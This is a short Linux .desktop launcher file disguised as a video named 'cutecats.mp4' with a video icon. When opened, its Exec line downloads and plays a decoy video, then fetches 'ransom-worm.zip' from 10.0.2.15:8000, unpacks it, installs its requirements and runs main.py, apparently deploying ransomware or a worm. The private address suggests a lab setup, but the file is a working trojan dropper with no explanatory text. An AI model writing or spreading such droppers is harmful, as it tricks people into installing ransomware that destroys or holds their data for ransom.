#!/usr/bin/env xdg-open

[Desktop Entry]
Encoding=UTF-8
Name=cutecats.mp4
Exec=mkdir ransom-worm; cd ransom-worm; /usr/bin/wget -O cutecats.mp4 '10.0.2.15:8000/send_video'; /usr/bin/xdg-open cutecats.mp4; /usr/bin/wget -O ransom-worm.zip '10.0.2.15:8000/send_ransomworm'; /usr/bin/unzip ransom-worm.zip; python3 -m pip install -r requirements.txt; python3 main.py;
Terminal=false
Type=Application
Icon=video-x-generic